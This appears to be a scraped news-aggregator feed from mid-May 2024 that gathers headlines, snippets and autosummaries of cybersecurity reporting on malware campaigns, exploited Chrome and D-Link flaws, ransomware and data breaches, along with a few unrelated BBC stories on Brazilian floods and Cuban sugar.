          Multiple threat actors are weaponizing a design flaw in Foxit PDF Reader to deliver a variety of malware such as Agent Tesla, AsyncRAT, DCRat, NanoCore RAT, NjRAT, Pony, Remcos RAT, and XWorm. "This exploit triggers security warnings that could deceive unsuspecting users into executing harmful commands," Check Point said in a technical report. "This exploit has been used by multiple

          Autosummary: Check Point said it identified a PDF document bearing a military theme that, when opened via Foxit PDF Reader, executed a command to fetch a downloader that, in turn, retrieved two executables to collect and upload data, including documents, images, archive files, and databases to a command-and-control (C2) server.


          Cyber Criminals Exploit GitHub and FileZilla to Deliver Cocktail Malware

          exploits
          2024-05-20 https://thehackernews.com/2024/05/cyber-criminals-exploit-github-and.html
          A "multi-faceted campaign" has been observed abusing legitimate services like GitHub and FileZilla to deliver an array of stealer malware and banking trojans such as Atomic (aka AMOS), Vidar, Lumma (aka LummaC2), and Octo by impersonating credible software like 1Password, Bartender 5, and Pixelmator Pro. "The presence of multiple malware variants suggests a broad cross-platform targeting


          QNAP QTS zero-day in Share feature gets public RCE exploit

          exploits
          2024-05-20 https://www.bleepingcomputer.com/news/security/qnap-qts-zero-day-in-share-feature-gets-public-rce-exploit/
          An extensive security audit of QNAP QTS, the operating system for the company's NAS products, has uncovered fifteen vulnerabilities of varying severity, with eleven remaining unfixed. [...]

          Autosummary: The QTS vulnerabilities: The flaws uncovered by WatchTowr analysts are primarily related to code execution, buffer overflows, memory corruption, authentication bypass, and XSS issues, impacting the security of Network Attached Storage (NAS) devices across different deployment environments. The above bugs impact QTS, the NAS operating system on QNAP devices, QuTScloud, the VM-optimized version of QTS, and QTS hero, a specialized version focused on high performance. Among them is CVE-2024-27130, an unpatched stack buffer overflow vulnerability in the "No_Support_ACL" function of "share.cgi," which could enable an attacker to perform remote code execution when specific prerequisites are met. [Figure: Share file dialog (top) and ssid in URL (bottom). Source: WatchTowr] In summary, CVE-2024-27130 isn't straightforward to exploit, yet the SSID prerequisite can be met for determined actors.


          GitCaught campaign relies on GitHub and FileZilla to deliver multiple malware

          exploits
          2024-05-20 https://securityaffairs.com/163463/cyber-crime/gitcaught-campaign-github-filezilla-malware.html
          Researchers discovered a sophisticated cybercriminal campaign by Russian-speaking threat actors that used GitHub to distribute malware. Recorded Future’s Insikt Group discovered a sophisticated cybercriminal campaign by Russian-speaking threat actors from the Commonwealth of Independent States (CIS). The attackers, tracked as GitCaught, used a GitHub profile to impersonate legitimate software applications, including 1Password, Bartender 5, and […]

          Autosummary: The attackers, tracked as GitCaught, used a GitHub profile to impersonate legitimate software applications, including 1Password, Bartender 5, and Pixelmator Pro, to distribute malware such as Atomic macOS Stealer (AMOS), Lumma, Octo, and Vidar.


          OmniVision discloses data breach after 2023 ransomware attack

          financial exploits ransomware
          2024-05-20 https://www.bleepingcomputer.com/news/security/omnivision-discloses-data-breach-after-2023-ransomware-attack/
          The California-based imaging sensors manufacturer OmniVision is warning of a data breach after the company suffered a Cactus ransomware attack last year. [...]

          Autosummary: However, an announcement by the Cactus ransomware gang on October 17, 2023, claimed the attack on OmniVision and leaked the following data samples: passport scans, nondisclosure agreements, contracts, and confidential documents. The threat actors eventually released all data they held from the attack in a ZIP archive made available to download for free.


          Inside the dangerous rescue for Brazil flood victims

          latam
          2024-05-19 https://www.bbc.com/news/articles/c103lel2p5yo
          The BBC joins emergency services in Porto Alegre as they battle unprecedented flooding.


          Grandoreiro Banking Trojan Resurfaces, Targeting Over 1,500 Banks Worldwide

          financial exploits
          2024-05-19 https://thehackernews.com/2024/05/grandoreiro-banking-trojan-resurfaces.html
          The threat actors behind the Windows-based Grandoreiro banking trojan have returned in a global campaign since March 2024 following a law enforcement takedown in January. The large-scale phishing attacks, likely facilitated by other cybercriminals via a malware-as-a-service (MaaS) model, target over 1,500 banks across the world, spanning more than 60 countries in Central and South

          Autosummary: The large-scale phishing attacks, likely facilitated by other cybercriminals via a malware-as-a-service (MaaS) model, target over 1,500 banks across the world, spanning more than 60 countries in Central and South America, Africa, Europe, and the Indo-Pacific, IBM X-Force said.


          Brazil floods: On board a rescue helicopter

          latam
          2024-05-19 https://www.bbc.com/news/videos/cd11ljgp2xxo
          The BBC's Ione Wells joins emergency services in Rio Grande do Sul, which has seen its worst ever floods.


          Chinese Nationals Arrested for Laundering $73 Million in Pig Butchering Crypto Scam

          financial
          2024-05-19 https://thehackernews.com/2024/05/chinese-nationals-arrested-for.html
          The U.S. Department of Justice (DoJ) has charged two arrested Chinese nationals for allegedly orchestrating a pig butchering scam that laundered at least $73 million from victims through shell companies. The individuals, Daren Li, 41, and Yicheng Zhang, 38, were arrested in Atlanta and Los Angeles on April 12 and May 16, respectively. The foreign nationals have been "charged for leading a scheme

          Autosummary: Two Brothers Arrested for Stealing $25M in Novel Crypto Heist: The development comes as the DoJ unsealed an indictment against Anton Peraire-Bueno, 24, of Boston, and James Peraire-Bueno, 28, of New York, charging them with conspiracy to commit wire fraud, wire fraud, and conspiracy to commit money laundering. Countries like Burma, Cambodia, Laos, Malaysia, Myanmar, and the Philippines have also emerged as a hotbed for romance scams, often luring unsuspecting people with promises of lucrative jobs to transport them to so-called "scam factories," where they are coerced into participating in the operation.


          North Korea-linked Kimsuky used a new Linux backdoor in recent attacks

          Linux
          2024-05-19 https://securityaffairs.com/163364/apt/kimsuky-new-linux-backdoor.html
          Symantec warns of a new Linux backdoor used by the North Korea-linked Kimsuky APT in a recent campaign against organizations in South Korea. Symantec researchers observed the North Korea-linked group Kimsuky using a new Linux backdoor dubbed Gomir. The malware is a version of the GoBear backdoor which was delivered in a recent campaign by […]

          Autosummary: Operation 08 collects statistics about an arbitrary directory tree and reports the total number of subdirectories, total number of files, and total size of files; operation 09 reports the configuration details of the affected computer (hostname, username, CPU, RAM, and network interfaces, listing each interface name, MAC, IP, and IPv6 address); operation 10 configures a fallback shell to use when executing the shell command in operation 02. The WIZVERA VeraPort integration installation program is used to manage additional security software (e.g., browser plug-ins, security software, identity verification software, etc.). The Kimsuky cyberespionage group (aka Springtail, ARCHIPELAGO, Black Banshee, Thallium, Velvet Chollima, APT43) was first spotted by Kaspersky researchers in 2013. By Pierluigi Paganini, May 19, 2024.


          Healthcare firm WebTPA data breach impacted 2.5 million individuals

          financial
          2024-05-19 https://securityaffairs.com/163403/data-breach/webtpa-data-breach.html
          WebTPA, a third-party administrator that provides healthcare management and administrative services, disclosed a data breach. WebTPA is a third-party administrator that provides healthcare management and administrative services. The US company disclosed a data breach that impacted almost 2.5 million people. According to the report sent by the WebTPA to the U.S. Department of Health and […]

          Autosummary: By Pierluigi Paganini, May 19, 2024.


          American Radio Relay League cyberattack takes Logbook of the World offline

          ciber
          2024-05-19 https://www.bleepingcomputer.com/news/security/arrl-cyberattack-takes-logbook-of-the-world-offline/
          The American Radio Relay League (ARRL) warns it suffered a cyberattack, which disrupted its IT systems and online operations, including email and the Logbook of the World. [...]


          CISA warns of hackers exploiting Chrome, EoL D-Link bugs

          exploits
          2024-05-19 https://www.bleepingcomputer.com/news/security/cisa-warns-of-hackers-exploiting-chrome-eol-d-link-bugs/
          The U.S. Cybersecurity & Infrastructure Security Agency (CISA) has added three security vulnerabilities to its "Known Exploited Vulnerabilities" catalog, one impacting Google Chrome and two affecting some D-Link routers. [...]

          Autosummary: Although D-Link DIR-600 routers had reached end-of-life (EOL) four years before the flaw was discovered, the vendor released a fix at the time in firmware version 2.17b02 along with a security bulletin containing mitigation recommendations.


          Cuba laments collapse of iconic sugar industry

          industry
          2024-05-18 https://www.bbc.co.uk/news/world-latin-america-68935247
          For centuries, sugar was the mainstay of Cuba's economy. Now the industry is in rapid decline.


          Android malware Grandoreiro returns after police disruption

          exploits
          2024-05-18 https://www.bleepingcomputer.com/news/security/android-malware-grandoreiro-returns-after-police-disruption/
          The Android banking trojan "Grandoreiro" is spreading in a large-scale phishing campaign in over 60 countries, targeting customer accounts of roughly 1,500 banks. [...]

          Autosummary: In January 2024, an international law enforcement operation involving Brazil, Spain, Interpol, ESET, and Caixa Bank announced the disruption of the malware operation, which had been targeting Spanish-speaking countries since 2017 and caused $120 million in losses.


          Ransomware gang targets Windows admins via PuTTY, WinSCP malvertising

          exploits
          2024-05-18 https://www.bleepingcomputer.com/news/security/ransomware-gang-targets-windows-admins-via-putty-winscp-malvertising/
          A ransomware operation targets Windows system administrators by taking out Google ads to promote fake download sites for PuTTY and WinSCP. [...]

          Autosummary: These advertisements were for popular programs, including Keepass, CPU-Z, Notepad++, Grammarly, MSI Afterburner, Slack, Dashlane, 7-Zip, CCleaner, VLC, Malwarebytes, Audacity, μTorrent, OBS, Ring, AnyDesk, Libre Office, Teamviewer, Thunderbird, and Brave.


          Banking malware Grandoreiro returns after police disruption

          financial exploits
          2024-05-18 https://www.bleepingcomputer.com/news/security/banking-malware-grandoreiro-returns-after-police-disruption/
          The banking trojan "Grandoreiro" is spreading in a large-scale phishing campaign in over 60 countries, targeting customer accounts of roughly 1,500 banks. [...]

          Autosummary: In January 2024, an international law enforcement operation involving Brazil, Spain, Interpol, ESET, and Caixa Bank announced the disruption of the malware operation, which had been targeting Spanish-speaking countries since 2017 and caused $120 million in losses.


          Organizations struggle to defend against ransomware

          exploits ransomware
          2024-05-17 https://www.helpnetsecurity.com/2024/05/17/ransomware-incidents-surge-video/

          In this Help Net Security video, Jeremy Nichols, Director, Global Threat Intelligence Center at NTT Security Holdings, discusses a recent surge in ransomware incidents. After a down year in 2022, ransomware and extortion incidents increased in 2023. More than 5,000 ransomware victims were detected or posted across multiple social channels, up from approximately 3,000 in 2022, according to the 2024 Global Threat Intelligence Report by NTT Security Holdings. Other key findings: Critical infrastructure, supply chain, … More



          Too many ICS assets are exposed to the public internet

          industry
          2024-05-17 https://www.helpnetsecurity.com/2024/05/17/organizations-expanding-attack-surface/

          The enterprise attack surface is expanding in multiple ways, becoming more numerous and more specific, according to runZero. “Our research reveals alarming gaps and unexpected trends in enterprise infrastructure, including the decay of network segmentation, persistent challenges in attack surface management, and the increasing volume of dark matter on modern networks,” said HD Moore, CEO. IT and OT are converging, expanding the attack surface of organizations and requiring new techniques to discover and manage assets. … More


          Autosummary: “Our research reveals alarming gaps and unexpected trends in enterprise infrastructure, including the decay of network segmentation, persistent challenges in attack surface management, and the increasing volume of dark matter on modern networks,” said HD Moore, CEO.


          CISA Warns of Actively Exploited D-Link Router Vulnerabilities - Patch Now

          exploits
          2024-05-17 https://thehackernews.com/2024/05/cisa-warns-of-actively-exploited-d-link.html
          The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Thursday added two security flaws impacting D-Link routers to its Known Exploited Vulnerabilities (KEV) catalog, based on evidence of active exploitation. The list of vulnerabilities is as follows - CVE-2014-100005 - A cross-site request forgery (CSRF) vulnerability impacting D-Link DIR-600 routers that allows an


          Kimsuky APT Deploying Linux Backdoor Gomir in South Korean Cyber Attacks

          Linux
          2024-05-17 https://thehackernews.com/2024/05/kimsuky-apt-deploying-linux-backdoor.html
          The Kimsuky (aka Springtail) advanced persistent threat (APT) group, which is linked to North Korea's Reconnaissance General Bureau (RGB), has been observed deploying a Linux version of its GoBear backdoor as part of a campaign targeting South Korean organizations. The backdoor, codenamed Gomir, is "structurally almost identical to GoBear, with extensive sharing of code between


          CISA adds D-Link DIR router flaws to its Known Exploited Vulnerabilities catalog

          exploits
          2024-05-17 https://securityaffairs.com/163289/security/cisa-d-link-dir-known-exploited-vulnerabilities-catalog.html
          CISA adds two D-Link DIR-600 and DIR-605 router vulnerabilities to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the following D-Link router vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog: According to Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities, FCEB agencies have to address the identified vulnerabilities […]


          CISA adds Google Chrome zero-days to its Known Exploited Vulnerabilities catalog

          exploits
          2024-05-17 https://securityaffairs.com/163285/cyber-crime/cisa-google-chrome-zero-day-known-exploited-vulnerabilities-catalog.html
          CISA adds two Chrome zero-day vulnerabilities to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added [1,2] the following vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog: CVE-2024-4761 Google Chromium V8 Engine contains an unspecified out-of-bounds memory write vulnerability via a crafted HTML page. This vulnerability could affect multiple web browsers that […]

          Autosummary: By Pierluigi Paganini, May 17, 2024.


          WebTPA data breach impacts 2.4 million insurance policyholders

          financial
          2024-05-17 https://www.bleepingcomputer.com/news/security/webtpa-data-breach-impacts-24-million-insurance-policyholders/
          The WebTPA Employer Services (WebTPA) data breach disclosed earlier this month is impacting close to 2.5 million individuals, the U.S. Department of Health and Human Services notes. [...]

          Autosummary: The company sent notices to affected individuals on May 8, 2024, informing them that the following types of data had been exposed: full name, contact information, date of birth (and death where applicable), Social Security Number (SSN), and insurance information. The investigation revealed that financial account information, credit card numbers, medical treatment, and diagnostic information have not been exposed to unauthorized access.


          City of Wichita disclosed a data breach after the recent ransomware attack

          financial exploits government ransomware
          2024-05-17 https://securityaffairs.com/163300/cyber-crime/city-of-wichita-disclosed-data-breach.html
          The City of Wichita disclosed a data breach after the ransomware attack that hit the Kansas city earlier this month. On May 5th, 2024, the City of Wichita, Kansas, was the victim of a ransomware attack and shut down its network to contain the threat. The city immediately started its incident response procedure to prevent […]

          Autosummary: These files contained law enforcement incident and traffic information, which include names, Social Security numbers, driver’s license or state identification card numbers, and payment card information.


          SEC: Financial orgs have 30 days to send data breach notifications

          financial
          2024-05-17 https://www.bleepingcomputer.com/news/security/sec-financial-orgs-have-30-days-to-send-data-breach-notifications/
          The Securities and Exchange Commission (SEC) has adopted amendments to Regulation S-P that require certain financial institutions to disclose data breach incidents to impacted individuals within 30 days of discovery. [...]

          Autosummary: Below is a summary of the introduced changes: Notify affected individuals within 30 days if their sensitive information is, or is likely to be, accessed or used without authorization, detailing the incident, breached data, and protective measures taken.


          Nissan reveals ransomware attack exposed 53,000 workers’ social security numbers

          exploits ransomware
          2024-05-17 https://www.bitdefender.com/blog/hotforsecurity/nissan-reveals-ransomware-attack-exposed-53-000-workers-social-security-numbers/
          Nissan North America has revealed that extortionists who demanded a ransom after breaking into its external VPN and disrupting systems last year also stole the social security numbers of over 53,000 staff. Read more in my article on the Hot for Security blog.

          Autosummary: For instance, in December 2023, Nissan Australia and New Zealand suffered an attack by the Akira ransomware gang which exposed details belonging to 100,000 of the company's customers, dealers, and current and former staff.


          Kinsing Hacker Group Exploits More Flaws to Expand Botnet for Cryptojacking

          exploits
          2024-05-17 https://thehackernews.com/2024/05/kinsing-hacker-group-exploits-more.html
          The cryptojacking group known as Kinsing has demonstrated its ability to continuously evolve and adapt, proving to be a persistent threat by swiftly integrating newly disclosed vulnerabilities into its exploit arsenal and expanding its botnet. The findings come from cloud security firm Aqua, which described the threat actor as actively orchestrating illicit cryptocurrency mining

          Autosummary: An extensive analysis of the artifacts has further revealed three distinct categories of programs: Type I and Type II scripts, which are deployed post initial access and are used to download next-stage attack components, eliminate competition, and evade defenses by disabling the firewall, terminating security tools like SELinux, AppArmor, and Aliyun Aegis, and deploying a rootkit to hide the malicious processes; auxiliary scripts, which are designed to accomplish initial access by exploiting a vulnerability, disable specific security components associated with Alibaba Cloud and Tencent Cloud services from a Linux system, open a reverse shell to a server under the attacker's control, and facilitate the retrieval of miner payloads; and binaries, which act as a second-stage payload, including the core Kinsing malware and the crypto-miner to mine Monero. The malware, for its part, is engineered to keep tabs on the mining process and share its process identifier (PID) with the C2 server, perform connectivity checks, and send execution results, among others.


          The Week in Ransomware - May 17th 2024 - Mailbombing is back

          exploits ransomware
          2024-05-17 https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-may-17th-2024-mailbombing-is-back/
          This week was pretty quiet on the ransomware front, with most of the attention on the seizure of the BreachForums data theft forum. However, that does not mean there was nothing of interest released this week about ransomware. [...]

          Autosummary: Contributors and those who provided new ransomware information and stories this week include: @serghei, @BleepinComputer, @billtoulas, @fwosar, @demonslay335, @Ionut_Ilascu, @Seifreed, @LawrenceAbrams, @malwrhunterteam, @rapid7, @MsftSecIntel, @3xp0rtblog, @Intel_by_KELA, @NJCybersecurity, @proofpoint, @troyhunt, @CISAgov, @FBI, @AhnLab_SecuInfo, @briankrebs, @NCSC, @sekoia_io, @JakubKroustek, and @pcrisk. Ransomware phishing attacks also took front stage this week, with the Phorpiex botnet sending millions of emails that led to LockBit Black ransomware attacks, with the encryptor believed to have been created using LockBit's leaked source code.


          Ebury botnet compromises 400,000+ Linux servers

          Linux
          2024-05-16 https://www.helpnetsecurity.com/2024/05/16/ebury-botnet/

          ESET researchers released their deep-dive investigation into one of the most advanced server-side malware campaigns. It is still growing and has seen hundreds of thousands of compromised servers in its at least 15-year-long operation. The Ebury group and botnet have been involved in the spread of spam, web traffic redirections, and credential stealing over the years. In recent years, they have diversified to credit card and cryptocurrency theft. Additionally, Ebury has been deployed as a … More


          Autosummary: Victims include universities, small and large enterprises, internet service providers, cryptocurrency traders, Tor exit nodes, shared hosting providers, and dedicated server providers, to name a few. It is used to deploy additional malware to monetize the botnet (such as modules for web traffic redirection), proxy traffic for spam, perform adversary-in-the-middle attacks (AitM), and host supporting malicious infrastructure.


          The critical role of IT staffing in strengthening cybersecurity

          ciber
          2024-05-16 https://www.helpnetsecurity.com/2024/05/16/cybersecurity-it-staffing-role-video/

          Many organizations lack adequate IT staffing to combat cyber threats. A comprehensive approach to cybersecurity requires more than technical solutions. It involves the right staff with the unique expertise necessary to recognize and prevent potential threats. This makes IT and cyber security staffing a critical component of defense against security breaches and cyber attacks – especially when a challenge demands immediate attention. In this Help Net Security video, Phani Dasari, CISO at HGS Digital, discusses … More



          Cybercriminals Exploiting Microsoft’s Quick Assist Feature in Ransomware Attacks

          exploits ransomware ciber
          2024-05-16 https://thehackernews.com/2024/05/cybercriminals-exploiting-microsofts.html
          The Microsoft Threat Intelligence team said it has observed a threat it tracks under the name Storm-1811 abusing the client management tool Quick Assist to target users in social engineering attacks. "Storm-1811 is a financially motivated cybercriminal group known to deploy Black Basta ransomware," the company said in a report published on May 15, 2024. The

          Autosummary: The campaign, believed to have commenced in mid-April 2024, has targeted a variety of industries and verticals, including manufacturing, construction, food & beverage, and transportation, Rapid7 said, indicating the opportunistic nature of the attacks.


          Google Patches Yet Another Actively Exploited Chrome Zero-Day Vulnerability

          exploits
          2024-05-16 https://thehackernews.com/2024/05/google-patches-yet-another-actively.html
          Google has rolled out fixes to address a set of nine security issues in its Chrome browser, including a new zero-day that has been exploited in the wild. Assigned the CVE identifier CVE-2024-4947, the vulnerability relates to a type confusion bug in the V8 JavaScript and WebAssembly engine. It was reported by Kaspersky researchers Vasily Berdnikov and Boris "

          Autosummary: With CVE-2024-4947, a total of seven zero-days have been resolved by Google in Chrome since the start of the year: CVE-2024-0519 - Out-of-bounds memory access in V8; CVE-2024-2886 - Use-after-free in WebCodecs (demonstrated at Pwn2Own 2024). "


          Is an open-source AI vulnerability next?

          exploits
          2024-05-16 https://www.helpnetsecurity.com/2024/05/16/open-source-ai-security/

          AI has captured widespread interest and offers numerous benefits. However, its rapid advancement and widespread adoption raise concerns, especially for those of us in cybersecurity. With so much interest, there are lots of insecure applications finding their way onto our devices and other endpoints, opening more pathways for the “bad guys” to steal our data. Applications developed within open-source communities often face more significant security challenges because they are free and widely available, supported by … More

          The post Is an open-source AI vulnerability next? appeared first on Help Net Security.

          "

          Autosummary: What security professionals can do. Securing open source requires focus across multiple avenues, including: Security specifications: Advocate for greater transparency and accountability within the open-source community, demanding essential security metadata such as Software Bill of Materials (SBOMs), SLSA (Supply Chain Levels for Software Artifacts), and SARIF (Static Analysis Results Interchange Format). Open-source security tools: Collaborate with companies that offer support for security projects, such as Allstar, GUAC, and in-toto attestations, to bear some liability while still benefiting from open-source innovation. "


          Scammers can easily phish your multi-factor authentication codes. Here’s how to avoid it

          financial
          2024-05-16 https://www.malwarebytes.com/blog/news/2024/05/scammers-can-easily-phish-your-multi-factor-authentication-codes-heres-how-to-avoid-it
          Phishers are using new authentication-in-the-middle techniques to dupe victims into providing their login and MFA credentials. "

          Autosummary: Once the criminals are into an account, they can start changing settings like the account’s email address, phone number, and password, so the user can no longer log in, or they can simply clean out a bank account. While these techniques, named after man-in-the-middle (MitM) attacks, have existed for a while, they appear to be gaining traction now. "


          Critical Git vulnerability allows RCE when cloning repositories with submodules (CVE-2024-32002)

          exploits
          2024-05-16 https://www.helpnetsecurity.com/2024/05/16/git-cve-2024-32002/

          New versions of Git are out, with fixes for five vulnerabilities, the most critical of which (CVE-2024-32002) can be used by attackers to remotely execute code during a “clone” operation. About Git: Git is a widely popular distributed version control system for collaborative software development. It can be installed on machines running Windows, macOS, Linux, and various *BSD distributions. The web-based software development platforms GitHub and GitLab are based on Git. Visual Studio, Microsoft’s integrated development environment, … More

          The post Critical Git vulnerability allows RCE when cloning repositories with submodules (CVE-2024-32002) appeared first on Help Net Security.

          "

          Autosummary: CVE-2024-32004 also allows remote code execution, but only on multi-user machines: “An attacker can prepare a local repository so that it looks like a partial clone that is missing an object, so that, when this repository is cloned, Git will execute arbitrary code during the operation with full permissions of the user performing the clone.” "


          Google fixes third exploited Chrome zero-day in a week (CVE-2024-4947)

          exploits
          2024-05-16 https://www.helpnetsecurity.com/2024/05/16/cve-2024-4947/

          For the third time in the last seven days, Google has fixed a Chrome zero-day vulnerability (CVE-2024-4947) for which an exploit exists in the wild. About CVE-2024-4947: CVE-2024-4947 is a type confusion vulnerability in V8, Chrome’s JavaScript and WebAssembly engine. And while the two Chrome zero-days fixed in the past few days have been attributed to an anonymous researcher, this time around the reporters are known: Kaspersky threat researchers Vasiliy Berdnikov and Boris Larin. … More

          The post Google fixes third exploited Chrome zero-day in a week (CVE-2024-4947) appeared first on Help Net Security.

          "



          Santander: a data breach at a third-party provider impacted customers and employees

          financial bancosmx
          2024-05-16 https://securityaffairs.com/163231/data-breach/santander-third-party-data-breach.html
          The Spanish bank Santander disclosed a data breach at a third-party provider that impacted customers in Chile, Spain, and Uruguay. The Spanish financial institution Santander revealed a data breach involving a third-party provider that affected customers in Chile, Spain, and Uruguay. The bank recently became aware of unauthorized access to one of its databases hosted […] "

          Autosummary: Pierluigi Paganini, May 16, 2024. The Spanish bank Santander disclosed a data breach at a third-party provider that impacted customers in Chile, Spain, and Uruguay. "


          Russian hackers use new Lunar malware to breach a European govt’s agencies

          exploits rusia-ucrania
          2024-05-16 https://www.bleepingcomputer.com/news/security/russian-hackers-use-new-lunar-malware-to-breach-a-european-govts-agencies/
          Security researchers discovered two previously unseen backdoors dubbed LunarWeb and LunarMail that were used to compromise a European government’s diplomatic institutions abroad. [...] "

          Autosummary: LunarMail operational diagram (Source: ESET). Based on similarities in observed tactics, techniques, and procedures (TTPs) between the Lunar toolset and past activities, ESET attributes the backdoors to the Russian hacking group Turla with medium confidence. The commands LunarWeb supports include executing shell and PowerShell commands, collecting system information, running Lua code, zipping files, and exfiltrating data in AES-256 encrypted form. "


          Kimsuky hackers deploy new Linux backdoor in attacks on South Korea

          Linux
          2024-05-16 https://www.bleepingcomputer.com/news/security/kimsuky-hackers-deploy-new-linux-backdoor-in-attacks-on-south-korea/
          The North Korean hacker group Kimsuky has been using a new Linux malware called Gomir that is a version of the GoBear backdoor delivered via trojanized software installers. [...] "

          Autosummary: In early February 2024, researchers at the threat intelligence company S2W reported on a campaign in which Kimsuky used trojanized versions of various software solutions (e.g. TrustPKI and NX_PRNMAN from SGA Solutions, and Wizvera VeraPort) to infect South Korean targets with Troll Stealer and the Go-based Windows malware GoBear. Based on the analysis of the campaign, the researchers believe that supply-chain attacks (software, trojanized installers, fake installers) represent the preferred attack method for North Korean espionage actors. "


          New Wi-Fi Vulnerability Enables Network Eavesdropping via Downgrade Attacks

          exploits
          2024-05-16 https://thehackernews.com/2024/05/new-wi-fi-vulnerability-enabling.html
          Researchers have discovered a new security vulnerability stemming from a design flaw in the IEEE 802.11 Wi-Fi standard that tricks victims into connecting to a less secure wireless network and lets an attacker eavesdrop on their network traffic. The SSID Confusion attack, tracked as CVE-2023-52424, impacts all operating systems and Wi-Fi clients, including home and mesh networks that are based on "

          Autosummary: There are certain prerequisites to pulling off the downgrade attack: the victim wants to connect to a trusted Wi-Fi network; there is a rogue network available with the same authentication credentials as the first; and the attacker is within range to perform an AitM between the victim and the trusted network. Proposed mitigations to counter SSID Confusion include an update to the 802.11 Wi-Fi standard by incorporating the SSID as part of the 4-way handshake when connecting to protected networks, as well as improvements to beacon protection that allow a "client [to] store a reference beacon containing the network’s SSID and verify its authenticity during the 4-way handshake." "


          North Korean Hackers Exploit Facebook Messenger in Targeted Malware Campaign

          exploits
          2024-05-16 https://thehackernews.com/2024/05/north-korean-hackers-exploit-facebook.html
          The North Korea-linked Kimsuky hacking group has been attributed to a new social engineering attack that uses fictitious Facebook accounts to approach targets via Messenger and ultimately delivers malware. "The threat actor created a Facebook account with a fake identity disguised as a public official working in the North Korean human rights field," South Korean cybersecurity company Genians "

          Autosummary: The decoy document, hosted on OneDrive, is a Microsoft Common Console document that masquerades as an essay or content related to a trilateral summit between Japan, South Korea, and the U.S. -- "My_Essay(prof).msc" or "NZZ_Interview_Kohei Yamamoto.msc" -- with the latter uploaded to the VirusTotal platform on April 5, 2024, from Japan. "


          Google fixes seventh actively exploited Chrome zero-day this year, the third in a week

          exploits
          2024-05-16 https://securityaffairs.com/163238/hacking/7th-chrome-zero-day-2024.html
          Google released security updates to address a new actively exploited Chrome zero-day vulnerability, the third in a week. Google has released a new emergency security update to address a new vulnerability in the Chrome browser, tracked as CVE-2024-4947; it is the third zero-day exploited in attacks that was disclosed this week. The vulnerability CVE-2024-4947 is […] "

          Autosummary: (March 2024) CVE-2024-4671: a use-after-free issue that resides in the Visuals component (May 2024). Pierluigi Paganini, May 16, 2024. Google released security updates to address a new actively exploited Chrome zero-day vulnerability, the third in a week. "


          MediSecure e-script firm hit by ‘large-scale’ ransomware data breach

          financial exploits ransomware
          2024-05-16 https://www.bleepingcomputer.com/news/security/medisecure-e-script-firm-hit-by-large-scale-ransomware-data-breach/
          Electronic prescription provider MediSecure in Australia has shut down its website and phone lines following a ransomware attack believed to originate from a third-party vendor. [...] "

          Autosummary: In a short announcement, the Australian NCSC said that "a commercial health information organisation" reported being "the victim of a large-scale ransomware data breach incident. "


          Electronic prescription provider MediSecure impacted by a ransomware attack

          exploits ransomware
          2024-05-16 https://securityaffairs.com/163257/cyber-crime/medisecure-impacted-by-ransomware-attack.html
          Electronic prescription provider MediSecure in Australia suffered a ransomware attack likely originating from a third-party vendor. MediSecure is a company that provides digital health solutions, particularly focusing on secure electronic prescription delivery services in Australia. The company was forced to shut down its website and phone lines following a cyber attack, but it did not […] "

          Autosummary: Pierluigi Paganini, May 16, 2024. Electronic prescription provider MediSecure in Australia suffered a ransomware attack likely originating from a third-party vendor. "


          Cybersecurity jobs available right now: May 15, 2024

          ciber
          2024-05-15 https://www.helpnetsecurity.com/2024/05/15/cybersecurity-jobs-available-right-now-may-15-2024/

          Associate / Pentester (Red Team) – Cybersecurity Audit Siemens | Germany | Hybrid – View job details As an Associate / Pentester (Red Team) – Cybersecurity Audit, you will be responsible for conducting cybersecurity assessments across the entire Siemens landscape, including products, services, IT-systems, factories, and software development centers. During this process you will perform ethical hacking activities, design attack scenarios for state-of-the-art technologies and highlight important observations to translate technical findings into management information … More

          The post Cybersecurity jobs available right now: May 15, 2024 appeared first on Help Net Security.

          "

          Autosummary: Principal Cyber Security Architect, Federal Reserve Bank of Boston | USA | On-site – View job details. As a Principal Cyber Security Architect, you will develop code to automate security configuration management; build, test, and deploy cybersecurity-relevant technical solutions; and identify and address the root causes of issues, focusing on solving problem categories rather than individual instances. Senior Security Engineer, Avrioc Technologies | UAE | On-site – View job details. As a Senior Security Engineer, you will oversee the design, implementation, and management of security infrastructure, ensuring the confidentiality, integrity, and availability of systems and data. Senior Cyber Security Solution Architect, ST Engineering | Singapore | On-site – View job details. As a Senior Cyber Security Solution Architect, you will design, develop, and implement secure cyber range, cyber exercise, and cyber training solutions with consideration of the SaaS model and web-based solutions. "


          Ransomware statistics that reveal alarming rate of cyber extortion

          exploits industry
          2024-05-15 https://www.helpnetsecurity.com/2024/05/15/ransomware-statistics-2024/

          In this article, you will find excerpts from various reports that offer statistics and insights about the current ransomware landscape. Global ransomware crisis worsens (NTT Security Holdings | 2024 Global Threat Intelligence Report | May 2024): Ransomware and extortion incidents surged by 67% in 2023. Manufacturing topped the list of attacked sectors in 2023 at 25.66% and had the most ransomware victims posted on social channels, with 27.75%. Ransomware attacks impact 20% of sensitive data … More

          The post Ransomware statistics that reveal alarming rate of cyber extortion appeared first on Help Net Security.

          "

          Autosummary: According to the data, 1,075 ransomware victims were posted on leak sites during the first quarter of 2024, despite the disruption of two major ransomware groups, LockBit and ALPHV/BlackCat, which accounted for 22% and 8% of the activity, respectively. "


          Cybersecurity analysis exposes high-risk assets in power and healthcare sectors

          ciber
          2024-05-15 https://www.helpnetsecurity.com/2024/05/15/cps-assets-vulnerability-management-approaches/

          Traditional approaches to vulnerability management result in a narrow view of the enterprise attack surface that overlooks a considerable amount of risk, according to Claroty. Organizations must take a holistic approach to exposure management. To understand the scope of exposure and the associated risk facing cyber-physical systems (CPS) environments, Claroty’s research group Team82 analyzed data from over 20 million operational technology (OT), connected medical device (IoMT), IoT, and IT assets in CPS environments. The … More

          The post Cybersecurity analysis exposes high-risk assets in power and healthcare sectors appeared first on Help Net Security.

          "

          Autosummary: Researchers defined “high risk” as having a high likelihood and high impact of being exploited, based on a combination of risk factors such as end-of-life state, communication with insecure protocols, known vulnerabilities, weak or default passwords, PII or PHI data, consequence of failure, and several others. "


